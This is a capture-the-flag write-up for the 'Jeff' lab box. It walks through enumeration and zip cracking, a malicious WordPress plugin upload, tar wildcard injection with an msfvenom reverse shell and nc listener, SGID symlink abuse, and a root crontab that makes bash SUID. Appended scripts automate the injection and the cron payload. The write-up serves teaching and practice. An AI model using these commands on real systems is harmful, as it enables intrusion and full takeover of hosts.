Writeup: Jeff CTF

1. Port Scanning

I started with a simple nmap TCP port scan, and the output shows nothing beyond the usual.

[Image: nmap TCP scan of the Jeff CTF box]
Only two ports are open, 22/tcp (running OpenSSH 7.6p1) and 80/tcp (running nginx).

2. Web Server Enumeration & Vhost Discovery

The web server's main page appears to be completely empty, but viewing its source code we find a hint: the hostname jeff.thm.

[Image: hint in the source code of the web server's main page]

Let's add jeff.thm to our /etc/hosts, pointing at the target's IP.

[Image: adding jeff.thm to /etc/hosts]

We can now begin searching for valid subdomains and web server directories. To do so, gobuster fits our needs.

Running gobuster vhost mode with a DNS wordlist from seclists, we’re able to find a valid subdomain: wordpress.jeff.thm. Don’t forget to add it to your /etc/hosts file.

And running gobuster dir mode with the medium directory wordlist from dirbuster, we’re able to find 4 paths to follow: /uploads, /admin, /assets, /backups

There's nothing interesting on the jeff.thm main page: /uploads has an upload form that does absolutely nothing, /admin is blank and /assets returns 403 (Forbidden), which leaves /backups.
I ran gobuster dir mode again with the same wordlist, this time against http://jeff.thm/backups and with the -x option so that common backup extensions (.tar, .zip, .rar, .7z and .bak) are appended to each word. After a while it found a valid backup file: http://jeff.thm/backups/backup.zip

[Image: gobuster run against /backups on the Jeff CTF box]

3. Cracking Encrypted Backup File

We can download the backup file from /backups/backup.zip, but cannot unzip it because it's password-protected.

[Image: unzip failing on the backup file because it needs a password]

We can use John the Ripper and its helper tools to crack it. As it's a zip file, we first run zip2john to convert the archive into a hash format that john understands, then feed the result to john with a wordlist.


[Image: john output with the valid password for the zip file (REDACTED)]

Unzipping the backup, we find a valid password for the WordPress user in wpadmin.bak.

4. WordPress Exploitation & Initial Shell

Using the previously found password, we're able to log in as "jeff" at wordpress.jeff.thm/wp-login.php

After realizing that I won't be able to upload a reverse shell the usual way, such as editing a PHP file of the active theme through the theme editor, the solution I found was to upload a malicious plugin (links: Source // Download).
Go to Plugins > Add New > Upload Plugin, select the zip file, then install and activate it.

This is not a bug so much as an admin feature, and we could do it manually, but Metasploit's exploit/unix/webapp/wp_admin_shell_upload module automates it: given valid admin credentials it packages a PHP payload as a plugin, uploads it and requests the payload to get a session. Run msfconsole on your attacking machine and follow the steps below.

5. Docker Container Breakout

We received a reverse shell connection, but sadly we're inside a Docker container. There are several ways to confirm that; the most common is the presence of the file /.dockerenv (on older cgroup v1 hosts, "docker" showing up in /proc/1/cgroup is another tell).

We are logged in as "www-data", the account the web server runs as. Checking the /var/www/html folder, we find an interesting PHP file: /var/www/html/ftp_backup.php

The script uploads files to an FTP server on the host machine, and the host then does something with them. As it's a backup script, we can assume the host periodically compresses everything in that directory into a local archive, most likely with tar over an unquoted wildcard. If so, any file in that directory whose name begins with -- is expanded by the shell and parsed by tar as an option, which is the classic tar wildcard injection. That is the path to follow.

1. Enumerating – FTP Server

[Victim machine]$ curl -s -v -P - 'ftp://backupmgr:[email protected]'

(The credentials and host are redacted on the page.)

2. Exploiting – Tar

[Victim machine]$ echo '' > '--checkpoint-action=exec=sh shell.sh'
[Victim machine]$ echo '' > '--checkpoint=1'

P.S. This must be done inside a writable folder, like /dev/shm. Only the file names matter; their contents are irrelevant.

3. Exploiting – Shell generation

[Attacking machine]$ msfvenom -p cmd/unix/reverse_python lhost=YOUR-TUN0-IP lport=1234 R

Then copy the output and save it as shell.sh on the victim machine, or serve it with a python web server and fetch it with wget.

4. Uploading

Start the listener first, then upload all three files:

[Attacking machine]$ nc -lvnp 1234
[Victim machine]$ curl -T '--checkpoint-action=exec=sh shell.sh' -P - 'ftp://backupmgr:[email protected]/files/'
[Victim machine]$ curl -T '--checkpoint=1' -P - 'ftp://backupmgr:[email protected]/files/'
[Victim machine]$ curl -T shell.sh -P - 'ftp://backupmgr:[email protected]/files/'

When the host's backup job next runs tar over that directory, the checkpoint action executes sh shell.sh and the listener receives a shell on the host.
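The wildcard injection above, reproduced locally as an added example (this is not code from the original writeup). The host's backup job is never shown on the page, so the script simulates it with the assumed command tar cf backup.tar * run inside the upload directory; the file names follow the writeup, and everything happens in a temporary directory so nothing real is touched. The hardened variant shows the one-character fix a defender would apply.

```shell
#!/bin/sh
# Added demonstration of tar wildcard injection (not from the original writeup).
# The backup job is assumed to be `tar cf backup.tar *` run in the upload dir;
# file names (shell.sh, --checkpoint=1, --checkpoint-action=...) follow the writeup.

# Populate DIR with a benign file, the payload script and the two option-named files.
# PROOF is the marker file shell.sh creates, so we can tell whether it ran.
stage_payload() {
  dir=$1; proof=$2
  mkdir -p "$dir"
  echo "some data" > "$dir/data.txt"
  # shell.sh is what the checkpoint action runs; here it just drops a marker file
  printf '#!/bin/sh\necho pwned > "%s"\n' "$proof" > "$dir/shell.sh"
  # Plain, empty files: only their NAMES matter, tar parses them as options after '*' expands
  : > "$dir/--checkpoint=1"
  : > "$dir/--checkpoint-action=exec=sh shell.sh"
}

# Simulated vulnerable cron job: cd into the upload dir and tar with an unquoted glob.
# Returns 0 if the payload ran (marker file exists), 1 otherwise.
vulnerable_backup() {
  work=$(mktemp -d); proof="$work/proof"
  stage_payload "$work/files" "$proof"
  ( cd "$work/files" && tar cf "$work/backup.tar" * 2>/dev/null ) || true
  if [ -f "$proof" ]; then rc=0; else rc=1; fi
  rm -rf "$work"
  return $rc
}

# Hardened job: '--' ends option parsing, so the same names are archived as data.
# (Using ./* instead of * works too.) Returns 0 if the payload did NOT run.
hardened_backup() {
  work=$(mktemp -d); proof="$work/proof"
  stage_payload "$work/files" "$proof"
  ( cd "$work/files" && tar cf "$work/backup.tar" -- * 2>/dev/null ) || true
  if [ ! -f "$proof" ]; then rc=0; else rc=1; fi
  rm -rf "$work"
  return $rc
}

# Stand-alone run: print which variant executed the payload.
vulnerable_backup && echo "unquoted glob: payload executed"
hardened_backup && echo "with --: payload NOT executed"
```

The checkpoint fires on the first record tar writes, so even a directory with only these few small files is enough; --checkpoint=1 just makes sure it happens immediately rather than every tenth record. On the target, the payload runs as whatever user the host's cron job runs as, which is why the next section starts as backupmgr.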

6. Horizontal Privilege Escalation

There are two users that have a home directory, jeff and backupmgr (us). Let’s search for files owned by jeff.

We can transfer /opt/systools/systool (owned by jeff, readable only by him and members of the group "pwman") to our machine and analyze it further with reverse engineering tools. As it appears to be a simple ELF executable, let's start with the tool "strings".

The program opens "message.txt" every time option 2 is chosen. Its permissions are peculiar: the SGID bit is set, which means it runs with the pwman group's permissions. Since it reads message.txt from its working directory, replacing that file with a symlink to a pwman-readable file makes the SGID binary read that file for us.

[Image: unusual SGID bit set on /opt/systools/systool; on top of that, the "pwman" group owns /var/backups/jeff.bak]

[Victim machine]$ cd /opt/systools
[Victim machine]$ rm message.txt
[Victim machine]$ ln -s /var/backups/jeff.bak message.txt
[Victim machine]$ ./systool
Choose your option: 2

Doing so prints the contents of jeff.bak, which is jeff's password, and we can log in as jeff by running $ su jeff
The user flag is stored in clear text, but the room expects its MD5, so run:
$ echo -n FLAG | md5sum

7. Vertical Privilege Escalation

As we have jeff's password, let's check his sudo rights and see if he can run something as another user, perhaps root.

[Image: sudo rights showing that "jeff" can run crontab as root]

It seems some restrictions are in place and several commands return errors from this shell. Let's use python to spawn a proper PTY and work around that:

python -c 'import pty; pty.spawn("/bin/bash")'

There are many ways to abuse a root crontab, but I chose to create a malicious python script in /dev/shm that runs a system command (chmod +s /bin/bash). Once cron has executed it as root, /bin/bash is SUID root and gives me a root shell.

Text editors are unstable in this kind of shell, so I wrote the script with a cat heredoc (cat <<EOF > /dev/shm/script.py ... EOF) rather than an editor.

[Victim Machine]$ sudo crontab -e
1. Scroll down to the bottom
2. Press i to enter insert mode
3. Paste this: * * * * * /usr/bin/python3 /dev/shm/script.py
4. Press Esc, then type :wq! and Enter to save and quit
5. Wait about a minute for the job to run, then:
[Victim Machine]$ /bin/bash -p

The -p flag tells bash to keep the effective UID granted by the SUID bit instead of dropping it, so the resulting shell is root.
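The crontab step above, staged without an editor, as an added example that is not part of the original writeup. The page never shows script.py itself, so the payload here is my own: it makes the path given as its argument SUID, defaulting to /bin/bash exactly as the writeup describes. Paths (/dev/shm/script.py, /usr/bin/python3) follow the writeup; the dry run points the payload at a throwaway file in a temporary directory so nothing real becomes SUID.

```shell
#!/bin/sh
# Added example (not from the original writeup): stage the cron payload with a
# heredoc, install it without an editor, and dry-run it before giving it to root.
# script.py contents are assumed; the writeup only says it runs chmod +s /bin/bash.

# Write the python payload with a quoted heredoc so nothing is expanded by the shell.
# With no argument it targets /bin/bash, as in the writeup.
write_payload() {
  cat > "$1" <<'EOF'
import os, sys
target = sys.argv[1] if len(sys.argv) > 1 else "/bin/bash"
os.system("chmod +s " + target)
EOF
}

# The crontab line the writeup pastes into `sudo crontab -e` (every minute, as root).
cron_entry() {
  printf '%s\n' "* * * * * /usr/bin/python3 /dev/shm/script.py"
}

# Editor-free install: append the entry to root's current crontab and reload it.
# Both invocations are still `crontab`, so they fit the sudo rule jeff has.
# Not called by the dry run; run it on the target by hand.
install_entry() {
  ( sudo crontab -l 2>/dev/null; cron_entry ) | sudo crontab -
}

# Dry run: does the payload actually set the SUID bit on what it's pointed at?
# Returns 0 when the target ends up with u+s, 1 otherwise.
dry_run() {
  work=$(mktemp -d)
  write_payload "$work/script.py"
  : > "$work/fakebash"; chmod 0755 "$work/fakebash"
  python3 "$work/script.py" "$work/fakebash"
  if [ -u "$work/fakebash" ]; then rc=0; else rc=1; fi
  rm -rf "$work"
  return $rc
}

# Stand-alone run: show the payload works and print the line to install.
dry_run && echo "payload sets SUID as expected; crontab line:" && cron_entry
```

On the target, write_payload /dev/shm/script.py followed by install_entry replaces the whole vi dance; a minute later /bin/bash -p gives the root shell. Note that chmod +s sets both SUID and SGID, which is why a SUID-root bash stands out immediately to any integrity or find -perm -4000 check, so clean up after the flag.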

 

Conclusion

Very cool machine, which covered a bunch of interesting topics. It took me a lot of time in order to complete the box, really testing my “tryhard” mentality. Overall, the Jeff CTF is a highly recommended room for anyone looking to improve their penetration testing skills in a fun and interactive way.

